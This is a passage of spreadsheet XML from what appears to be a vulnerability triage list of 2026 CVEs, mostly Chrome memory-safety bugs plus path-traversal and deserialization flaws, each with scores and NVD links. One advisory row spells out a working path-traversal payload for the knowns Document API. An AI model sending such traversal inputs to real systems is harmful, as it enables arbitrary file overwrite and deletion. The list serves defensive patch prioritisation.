          <t>marker through 2.0.0 contains a path traversal vulnerability in the FastAPI /marker/upload handler that fails to sanitize the file.filename parameter. Unauthenticated attackers can supply filenames containing directory traversal sequences to write arbitrary files to any location or delete existing files on the system.</t>
        </is>
      </c>
      <c r="M1047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85684</t>
        </is>
      </c>
    </row>
    <row r="1048">
      <c r="A1048" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85877</t>
        </is>
      </c>
      <c r="C1048" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1048" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1048" s="5" t="inlineStr"/>
      <c r="F1048" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1048" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1048" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2</t>
        </is>
      </c>
      <c r="I1048" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1048" s="5" t="inlineStr"/>
      <c r="K1048" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1048" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85877</t>
        </is>
      </c>
    </row>
    <row r="1049">
      <c r="A1049" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86099</t>
        </is>
      </c>
      <c r="C1049" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1049" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1049" s="5" t="inlineStr"/>
      <c r="F1049" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1049" s="5" t="inlineStr"/>
      <c r="H1049" s="5" t="inlineStr"/>
      <c r="I1049" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1049" s="5" t="inlineStr"/>
      <c r="K1049" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1049" s="5" t="inlineStr">
        <is>
          <t>Chainlit through 2.12.0 fails to validate the client-supplied socket.io sessionId parameter, allowing unauthenticated attackers to traverse filesystem paths by injecting absolute or relative path sequences. Attackers can craft malicious sessionId values that escape the upload directory and recursively delete arbitrary directories accessible to the service process.</t>
        </is>
      </c>
      <c r="M1049" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86099</t>
        </is>
      </c>
    </row>
    <row r="1050">
      <c r="A1050" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86404</t>
        </is>
      </c>
      <c r="C1050" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1050" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1050" s="5" t="inlineStr"/>
      <c r="F1050" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1050" s="5" t="inlineStr"/>
      <c r="H1050" s="5" t="inlineStr"/>
      <c r="I1050" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1050" s="5" t="inlineStr"/>
      <c r="K1050" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1050" s="5" t="inlineStr">
        <is>
          <t>EAP's Artemis deserialization configuration permits deserialization by default. ObjectMessage.getObject() uses ObjectInputStreamWithClassLoader, which implements allow-list/block-list filtering via its checkSecurity()/isTrustedType() method. However, by default both allow-list and block-list are empty. When the allow-list is empty (size == 0), isTrustedType() returns true for ALL classes. This means all classes are deserializable by default.</t>
        </is>
      </c>
      <c r="M1050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86404</t>
        </is>
      </c>
    </row>
    <row r="1051">
      <c r="A1051" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86482</t>
        </is>
      </c>
      <c r="C1051" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1051" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1051" s="5" t="inlineStr"/>
      <c r="F1051" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1051" s="5" t="inlineStr"/>
      <c r="H1051" s="5" t="inlineStr"/>
      <c r="I1051" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1051" s="5" t="inlineStr"/>
      <c r="K1051" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L1051" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 unchecked group membership changes allowed privilege escalation</t>
        </is>
      </c>
      <c r="M1051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86482</t>
        </is>
      </c>
    </row>
    <row r="1052">
      <c r="A1052" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86542</t>
        </is>
      </c>
      <c r="C1052" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1052" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1052" s="5" t="inlineStr"/>
      <c r="F1052" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1052" s="5" t="inlineStr"/>
      <c r="H1052" s="5" t="inlineStr"/>
      <c r="I1052" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1052" s="5" t="inlineStr"/>
      <c r="K1052" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1052" s="5" t="inlineStr">
        <is>
          <t>knowns before 0.30.0 fails to validate import names in the import routes, allowing unauthenticated attackers to write files outside the imports directory. Attackers can supply traversal sequences in the name parameter to escape the imports directory and overwrite arbitrary files writable by the server process.</t>
        </is>
      </c>
      <c r="M1052" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86542</t>
        </is>
      </c>
    </row>
    <row r="1053">
      <c r="A1053" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1053" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86775</t>
        </is>
      </c>
      <c r="C1053" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1053" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1053" s="5" t="inlineStr"/>
      <c r="F1053" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1053" s="5" t="inlineStr"/>
      <c r="H1053" s="5" t="inlineStr"/>
      <c r="I1053" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1053" s="5" t="inlineStr"/>
      <c r="K1053" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1053" s="5" t="inlineStr">
        <is>
          <t>knowns (npm package) versions &lt;= 0.29.1 contain a path traversal vulnerability in the Document API. The HTTP handler in internal/server/routes/docs.go normalizes the user-supplied document path with cleanDocPath(), which strips leading/trailing slashes and the .md suffix but does not neutralize ../ traversal sequences, and internal/storage/doc_store.go then builds the target path with filepath.Join(ds.docsDir(), filepath.FromSlash(doc.Path)+".md") without verifying that the resolved path remains inside the documents directory. In the default deployment, where the Management API is unauthenticated and bound to all interfaces, a remote unauthenticated attacker can supply a traversal payload (for example {"path": "../../../../tmp/knowns_pwn_marker"} to POST /api/docs, or an encoded path to GET /api/docs/...) to read, create, overwrite, or delete arbitrary files with a .md extension anywhere on the host filesystem and to create arbitrary directories via os.MkdirAll. This can expose sensitive data stored in other projects' documentation, corrupt or destroy files, and provide an arbitrary-write primitive that may be chained toward code execution. The issue is fixed in version 0.30.0.</t>
        </is>
      </c>
      <c r="M1053" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86775</t>
        </is>
      </c>
    </row>
    <row r="1054">
      <c r="A1054" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1054" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87430</t>
        </is>
      </c>
      <c r="C1054" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1054" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1054" s="5" t="inlineStr"/>
      <c r="F1054" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1054" s="5" t="inlineStr"/>
      <c r="H1054" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1054" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1054" s="5" t="inlineStr"/>
      <c r="K1054" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1054" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in WebRTC in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M1054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87430</t>
        </is>
      </c>
    </row>
    <row r="1055">
      <c r="A1055" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87433</t>
        </is>
      </c>
      <c r="C1055" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1055" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1055" s="5" t="inlineStr"/>
      <c r="F1055" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1055" s="5" t="inlineStr"/>
      <c r="H1055" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1055" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1055" s="5" t="inlineStr"/>
      <c r="K1055" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L1055" s="5" t="inlineStr">
        <is>
          <t>Race condition in FileAPI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87433</t>
        </is>
      </c>
    </row>
    <row r="1056">
      <c r="A1056" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87440</t>
        </is>
      </c>
      <c r="C1056" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1056" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1056" s="5" t="inlineStr"/>
      <c r="F1056" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1056" s="5" t="inlineStr"/>
      <c r="H1056" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1056" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1056" s="5" t="inlineStr"/>
      <c r="K1056" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1056" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in Media in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87440</t>
        </is>
      </c>
    </row>
    <row r="1057">
      <c r="A1057" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87444</t>
        </is>
      </c>
      <c r="C1057" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1057" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1057" s="5" t="inlineStr"/>
      <c r="F1057" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1057" s="5" t="inlineStr"/>
      <c r="H1057" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1057" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1057" s="5" t="inlineStr"/>
      <c r="K1057" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="L1057" s="5" t="inlineStr">
        <is>
          <t>Memory corruption in Codecs in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87444</t>
        </is>
      </c>
    </row>
    <row r="1058">
      <c r="A1058" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87460</t>
        </is>
      </c>
      <c r="C1058" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1058" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1058" s="5" t="inlineStr"/>
      <c r="F1058" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1058" s="5" t="inlineStr"/>
      <c r="H1058" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1058" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1058" s="5" t="inlineStr"/>
      <c r="K1058" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1058" s="5" t="inlineStr">
        <is>
          <t>Use after free in Platform in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87460</t>
        </is>
      </c>
    </row>
    <row r="1059">
      <c r="A1059" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87489</t>
        </is>
      </c>
      <c r="C1059" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1059" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1059" s="5" t="inlineStr"/>
      <c r="F1059" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1059" s="5" t="inlineStr"/>
      <c r="H1059" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1059" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1059" s="5" t="inlineStr"/>
      <c r="K1059" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="L1059" s="5" t="inlineStr">
        <is>
          <t>Memory corruption in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted Chrome extension. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M1059" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87489</t>
        </is>
      </c>
    </row>
    <row r="1060">
      <c r="A1060" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87536</t>
        </is>
      </c>
      <c r="C1060" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1060" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1060" s="5" t="inlineStr"/>
      <c r="F1060" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1060" s="5" t="inlineStr"/>
      <c r="H1060" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1060" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1060" s="5" t="inlineStr"/>
      <c r="K1060" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1060" s="5" t="inlineStr">
        <is>
          <t>Use after free in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87536</t>
        </is>
      </c>
    </row>
    <row r="1061">
      <c r="A1061" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1061" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87542</t>
        </is>
      </c>
      <c r="C1061" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1061" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1061" s="5" t="inlineStr"/>
      <c r="F1061" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1061" s="5" t="inlineStr"/>
      <c r="H1061" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1061" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1061" s="5" t="inlineStr"/>
      <c r="K1061" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1061" s="5" t="inlineStr">
        <is>
          <t>Use after free in Input in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87542</t>
        </is>
      </c>
    </row>
    <row r="1062">
      <c r="A1062" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87569</t>
        </is>
      </c>
      <c r="C1062" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1062" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1062" s="5" t="inlineStr"/>
      <c r="F1062" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1062" s="5" t="inlineStr"/>
      <c r="H1062" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1062" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1062" s="5" t="inlineStr"/>
      <c r="K1062" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1062" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Views in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87569</t>
        </is>
      </c>
    </row>
    <row r="1063">
      <c r="A1063" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87570</t>
        </is>
      </c>
      <c r="C1063" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1063" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1063" s="5" t="inlineStr"/>
      <c r="F1063" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1063" s="5" t="inlineStr"/>
      <c r="H1063" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1063" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1063" s="5" t="inlineStr"/>
      <c r="K1063" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1063" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to bypass site isolation via a crafted file. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87570</t>
        </is>
      </c>
    </row>
    <row r="1064">
      <c r="A1064" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87579</t>
        </is>
      </c>
      <c r="C1064" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1064" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1064" s="5" t="inlineStr"/>
      <c r="F1064" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1064" s="5" t="inlineStr"/>
      <c r="H1064" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1064" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1064" s="5" t="inlineStr"/>
      <c r="K1064" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1064" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in WebRTC in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87579</t>
        </is>
      </c>
    </row>
    <row r="1065">
      <c r="A1065" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87585</t>
        </is>
      </c>
      <c r="C1065" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1065" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1065" s="5" t="inlineStr"/>
      <c r="F1065" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1065" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1065" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1065" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1065" s="5" t="inlineStr"/>
      <c r="K1065" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1065" s="5" t="inlineStr">
        <is>
          <t>Double free in PDFium in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted PDF file. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87585</t>
        </is>
      </c>
    </row>
    <row r="1066">
      <c r="A1066" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87587</t>
        </is>
      </c>
      <c r="C1066" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1066" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1066" s="5" t="inlineStr"/>
      <c r="F1066" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1066" s="5" t="inlineStr"/>
      <c r="H1066" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1066" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1066" s="5" t="inlineStr"/>
      <c r="K1066" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1066" s="5" t="inlineStr">
        <is>
          <t>Use after free in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87587</t>
        </is>
      </c>
    </row>
    <row r="1067">
      <c r="A1067" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87588</t>
        </is>
      </c>
      <c r="C1067" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1067" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1067" s="5" t="inlineStr"/>
      <c r="F1067" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1067" s="5" t="inlineStr"/>
      <c r="H1067" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1067" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1067" s="5" t="inlineStr"/>
      <c r="K1067" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1067" s="5" t="inlineStr">
        <is>
          <t>Use after free in Chromecast in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87588</t>
        </is>
      </c>
    </row>
    <row r="1068">
      <c r="A1068" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87612</t>
        </is>
      </c>
      <c r="C1068" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1068" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1068" s="5" t="inlineStr"/>
      <c r="F1068" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1068" s="5" t="inlineStr"/>
      <c r="H1068" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1068" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1068" s="5" t="inlineStr"/>
      <c r="K1068" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L1068" s="5" t="inlineStr">
        <is>
          <t>Type confusion in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87612</t>
        </is>
      </c>
    </row>
    <row r="1069">
      <c r="A1069" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1069" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87617</t>
        </is>
      </c>
      <c r="C1069" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1069" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1069" s="5" t="inlineStr"/>
      <c r="F1069" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1069" s="5" t="inlineStr"/>
      <c r="H1069" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1069" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1069" s="5" t="inlineStr"/>
      <c r="K1069" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1069" s="5" t="inlineStr">
        <is>
          <t>Use after free in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
